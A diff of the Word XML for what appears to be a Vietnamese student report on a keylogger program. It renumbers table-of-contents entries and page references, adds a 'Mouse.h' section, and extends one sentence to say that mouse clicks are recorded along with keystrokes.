+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895361 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3475,7 +3597,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>15</w:t>
+              <w:t>17</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3502,7 +3624,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761772" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895362" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3510,11 +3632,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>2.2. File Keylogger.h</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.3. File Mouse.h</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3544,7 +3665,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761772 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895362 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3573,7 +3694,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>17</w:t>
+              <w:t>21</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3600,7 +3721,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761773" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895363" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3608,11 +3729,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>2.3. File Keylogger.cpp</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.4. File Keylogger.cpp</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3642,7 +3762,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761773 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895363 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3671,7 +3791,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>21</w:t>
+              <w:t>22</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3698,7 +3818,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761774" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895364" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3706,11 +3826,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>2.4. Build chương trình</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>2.5. Build chương trình</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3740,7 +3859,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761774 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895364 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3769,7 +3888,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>24</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3796,7 +3915,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761775" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895365" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3804,7 +3923,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -3838,7 +3956,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761775 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895365 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3867,7 +3985,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>23</w:t>
+              <w:t>25</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3891,12 +4009,11 @@
               <w:rStyle w:val="Hyperlink"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
-              <w:color w:val="auto"/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761776" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895366" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -3904,7 +4021,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -3938,7 +4054,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761776 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895366 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3967,7 +4083,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>25</w:t>
+              <w:t>26</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3981,7 +4097,15 @@
             </w:r>
           </w:hyperlink>
         </w:p>
-        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
@@ -3995,7 +4119,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761777" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895367" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4003,7 +4127,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -4037,7 +4160,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761777 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895367 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4066,7 +4189,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>26</w:t>
+              <w:t>27</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4093,7 +4216,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761778" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895368" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4101,7 +4224,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -4135,7 +4257,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761778 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895368 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4164,7 +4286,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>26</w:t>
+              <w:t>27</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4191,7 +4313,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761779" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895369" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4199,7 +4321,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -4233,7 +4354,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761779 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895369 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4262,7 +4383,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>29</w:t>
+              <w:t>30</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4286,12 +4407,11 @@
               <w:rStyle w:val="Hyperlink"/>
               <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
-              <w:color w:val="auto"/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761780" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895370" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4299,7 +4419,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -4333,7 +4452,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761780 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895370 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4362,7 +4481,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>30</w:t>
+              <w:t>31</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4376,7 +4495,15 @@
             </w:r>
           </w:hyperlink>
         </w:p>
-        <w:p/>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
         <w:p>
           <w:pPr>
             <w:pStyle w:val="TOC1"/>
@@ -4384,13 +4511,14 @@
               <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
               <w:noProof/>
               <w:sz w:val="28"/>
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761781" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895371" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4398,7 +4526,6 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
@@ -4432,7 +4559,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761781 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895371 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4461,7 +4588,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>31</w:t>
+              <w:t>32</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4474,6 +4601,122 @@
               <w:fldChar w:fldCharType="end"/>
             </w:r>
           </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:pStyle w:val="TOC1"/>
+            <w:tabs>
+              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
+            </w:tabs>
+            <w:rPr>
+              <w:rStyle w:val="Hyperlink"/>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:noProof/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
+          <w:hyperlink w:anchor="_Toc60895372" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hyperlink"/>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>TÀI LIỆU THAM KHẢO</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895372 \h </w:instrText>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="separate"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>33</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+                <w:noProof/>
+                <w:webHidden/>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="end"/>
+            </w:r>
+          </w:hyperlink>
+        </w:p>
+        <w:p>
+          <w:pPr>
+            <w:rPr>
+              <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+              <w:sz w:val="28"/>
+              <w:szCs w:val="28"/>
+            </w:rPr>
+          </w:pPr>
         </w:p>
         <w:p>
           <w:pPr>
@@ -4488,7 +4731,7 @@
               <w:szCs w:val="28"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761782" w:history="1">
+          <w:hyperlink w:anchor="_Toc60895373" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hyperlink"/>
@@ -4496,11 +4739,10 @@
                 <w:b/>
                 <w:bCs/>
                 <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>TÀI LIỆU THAM KHẢO</w:t>
+                <w:sz w:val="28"/>
+                <w:szCs w:val="28"/>
+              </w:rPr>
+              <w:t>PHỤ LỤC</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4530,7 +4772,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761782 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc60895373 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4559,105 +4801,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>32</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="end"/>
-            </w:r>
-          </w:hyperlink>
-        </w:p>
-        <w:p>
-          <w:pPr>
-            <w:pStyle w:val="TOC1"/>
-            <w:tabs>
-              <w:tab w:val="right" w:leader="dot" w:pos="9395"/>
-            </w:tabs>
-            <w:rPr>
-              <w:rFonts w:ascii="Times New Roman" w:eastAsiaTheme="minorEastAsia" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-              <w:noProof/>
-              <w:sz w:val="28"/>
-              <w:szCs w:val="28"/>
-            </w:rPr>
-          </w:pPr>
-          <w:hyperlink w:anchor="_Toc57761783" w:history="1">
-            <w:r>
-              <w:rPr>
-                <w:rStyle w:val="Hyperlink"/>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:b/>
-                <w:bCs/>
-                <w:noProof/>
-                <w:color w:val="auto"/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>PHỤ LỤC</w:t>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:tab/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="begin"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc57761783 \h </w:instrText>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:fldChar w:fldCharType="separate"/>
-            </w:r>
-            <w:r>
-              <w:rPr>
-                <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
-                <w:noProof/>
-                <w:webHidden/>
-                <w:sz w:val="28"/>
-                <w:szCs w:val="28"/>
-              </w:rPr>
-              <w:t>33</w:t>
+              <w:t>34</w:t>
             </w:r>
             <w:r>
               <w:rPr>
@@ -4729,7 +4873,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="5" w:name="_Toc57761754"/>
+      <w:bookmarkStart w:id="5" w:name="_Toc60895343"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -4844,7 +4988,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>9</w:t>
+              <w:t>10</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4893,7 +5037,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>16</w:t>
+              <w:t>17</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -4942,7 +5086,7 @@
                 <w:sz w:val="28"/>
                 <w:szCs w:val="28"/>
               </w:rPr>
-              <w:t>22</w:t>
+              <w:t>24</w:t>
             </w:r>
           </w:p>
         </w:tc>
@@ -5006,7 +5150,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="6" w:name="_Toc57761755"/>
+      <w:bookmarkStart w:id="6" w:name="_Toc60895344"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5049,7 +5193,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="7" w:name="_Toc57761756"/>
+      <w:bookmarkStart w:id="7" w:name="_Toc60895345"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5154,7 +5298,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="8" w:name="_Toc57761757"/>
+      <w:bookmarkStart w:id="8" w:name="_Toc60895346"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5396,7 +5540,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="9" w:name="_Toc57761758"/>
+      <w:bookmarkStart w:id="9" w:name="_Toc60895347"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5489,7 +5633,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="10" w:name="_Toc57761759"/>
+      <w:bookmarkStart w:id="10" w:name="_Toc60895348"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5529,6 +5673,14 @@
           <w:szCs w:val="28"/>
         </w:rPr>
         <w:t>những macro liên quan đến Keyboard,</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> Mouse</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -5574,7 +5726,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="11" w:name="_Toc57761760"/>
+      <w:bookmarkStart w:id="11" w:name="_Toc60895349"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5623,7 +5775,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="12" w:name="_Toc57761761"/>
+      <w:bookmarkStart w:id="12" w:name="_Toc60895350"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5841,7 +5993,7 @@
         </w:rPr>
       </w:pPr>
       <w:bookmarkStart w:id="13" w:name="_Toc43674104"/>
-      <w:bookmarkStart w:id="14" w:name="_Toc57761762"/>
+      <w:bookmarkStart w:id="14" w:name="_Toc60895351"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5894,7 +6046,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="15" w:name="_Toc57761763"/>
+      <w:bookmarkStart w:id="15" w:name="_Toc60895352"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -5994,7 +6146,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="16" w:name="_Toc57761764"/>
+      <w:bookmarkStart w:id="16" w:name="_Toc60895353"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7099,7 +7251,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="17" w:name="_Toc57761765"/>
+      <w:bookmarkStart w:id="17" w:name="_Toc60895354"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7146,7 +7298,39 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>ó khả năng ghi nhớ lại mọi phím bấm mà người dùng đã thực hiện ở trên bàn phím.</w:t>
+        <w:t>ó khả năng ghi nhớ lại mọi phím bấm</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>, chuột</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> mà người dùng đã thực hiện ở trên bàn phím</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> và click chuột</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="28"/>
+          <w:szCs w:val="28"/>
+        </w:rPr>
+        <w:t>.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -7227,7 +7411,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="18" w:name="_Toc57761766"/>
+      <w:bookmarkStart w:id="18" w:name="_Toc60895355"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
@@ -7459,7 +7643,7 @@
           <w:szCs w:val="28"/>
         </w:rPr>
       </w:pPr>
-      <w:bookmarkStart w:id="19" w:name="_Toc57761767"/>
+      <w:bookmarkStart w:id="19" w:name="_Toc60895356"/>
       <w:r>
         <w:rPr>
